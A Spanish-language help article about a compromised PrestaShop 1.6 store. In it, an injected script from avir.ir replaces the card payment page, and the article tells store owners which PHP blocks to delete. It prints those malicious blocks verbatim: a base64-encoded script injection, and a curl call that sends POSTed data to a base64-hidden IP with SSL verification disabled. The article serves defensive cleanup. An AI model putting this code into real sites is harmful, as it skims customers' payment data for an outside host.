PrestaShop 1.6 hack favicon.js avir.ir pagina pedidos con tarjeta

Modificado en: Vie, 2 Abr, 2021 a 4:07 P. M.

En el código fuente de la web de PrestaShop aparece al final un código extraño que hace saltar algunos antivirus como el Malware Bytes:

<script type="text/javascript" src="https://www.avir.ir/image/favicon.js"></script>

Este problema surge por un problema de seguridad de la versión de PrestaShop 1.6 o de algún módulo de terceros, aún no está claro.

El código inyectado provoca que el pago con tarjeta de la tienda cambie y se sustituya por otro:

Para solucionarlo temporalmente debes revisar los archivos:

classes/controller/Controller.php
classes/controller/AdminController.php

Y buscar y eliminar los siguientes bloques de códigos:

$html = trim($html);$html.=base64_decode('PHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiIHNyYz0iaHR0cHM6Ly93d3cuYXZpci5pci9pbWFnZS9mYXZpY29uLmpzIj48L3NjcmlwdD4=');

try {if(isset($_POST['statistics_hash'])){$array = array('statistics_hash'   => $_POST['statistics_hash'],);$linked="";$ch = curl_init(base64_decode("aHR0cHM6Ly80NS4xOTcuMTQxLjI1MC9hbmFseXRpY3MucGhw"));curl_setopt($ch, CURLOPT_POST, 1);curl_setopt($ch, CURLOPT_POSTFIELDS, $array); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);curl_setopt($ch, CURLOPT_HEADER, false);curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);$html = curl_exec($ch);curl_close($ch);  }} catch (Exception $e) {}

Más info sobre este problema en el Foro Oficial de PrestaShop:

https://www.prestashop.com/forums/topic/1045556-order-pages-calling-a-malicious-script-faviconjs/

Artículos relacionados